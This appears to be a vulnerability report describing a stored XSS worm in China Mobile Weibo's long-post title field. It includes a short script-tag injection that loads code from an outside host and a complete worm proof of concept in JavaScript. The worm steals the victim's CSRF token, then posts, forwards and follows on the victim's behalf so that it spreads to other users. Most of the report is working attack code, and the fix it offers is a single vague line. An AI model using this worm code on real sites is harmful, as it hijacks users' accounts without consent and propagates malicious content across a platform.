China Mobile Weibo storage XSS worm (with worm POC)
1. Forward Weibo
2. Posting new Weibo posts
3. Listen to me
The problem lies in the long Weibo post of China Mobile Weibo.
You can insert 30 characters of code without filtering the title.
<Script/src = // km3.pw> </script>
Page with question: http://weibo.10086.cn/cwb/article.php? Id = 10404
Once you log on to the China Mobile Weibo account to open this page, it will forward my weibo account, post a new Weibo account, and listen to me.
POC:
var csrfIDExp = /crumb":"\w{32}/; var PostUrl = "/ajax/json/pushfeed/pushfeed";var HomePage = "/weibo.php";var CsrfToken = "";var ShouTing = "/ajax/json/user/usercard/user_id=271843611?crumb=";var PostData = "text=%E6%88%91%E5%88%9A%E5%8F%91%E8%A1%A8%E4%BA%86%E4%B8%80%E7%AF%87%E6%96%B0%E5%BE%AE%E5%8D%9A%E6%9D%A5%E7%9C%8B%E7%9C%8B%E5%90%A7%EF%BC%9Ahttp%3A%2F%2Fweibo.10086.cn%2Fcwb%2Farticle.php%3Fid%3D10404&from=home_top&list_id=&crumb=";var ZhuanData = "feedid=183420367929375&text=%E6%8C%BA%E4%B8%8D%E9%94%99%E7%9A%84&from=forward&reply_note=on&crumb=";var Zhuanfa = "/ajax/json/pushfeed/pushforward";function Connection(Sendtype,url,content,callback){if (window.XMLHttpRequest){var xmlhttp=new XMLHttpRequest();}else{var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");} xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4&&xmlhttp.status==200){callback(xmlhttp.responseText);}}xmlhttp.open(Sendtype,url,true);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xmlhttp.send(content);}Connection("GET",HomePage,"",function(callback){CsrfToken = String(csrfIDExp.exec(callback)).replace('crumb":"','');Connection("GET",ShouTing+CsrfToken,"",function(callback){})Connection("POST",PostUrl,PostData+CsrfToken,function(callback){})Connection("POST",Zhuanfa,ZhuanData+CsrfToken,function(callback){})})
A csrftoken value is required for posting, forwarding, and listening on weibo, which can be easily obtained in/weibo. php.
The effect is as follows:
Http://km3.pw/10086women.mp4 please watch video
Solution:
The input and output are filtered by the blacklist and whitelist.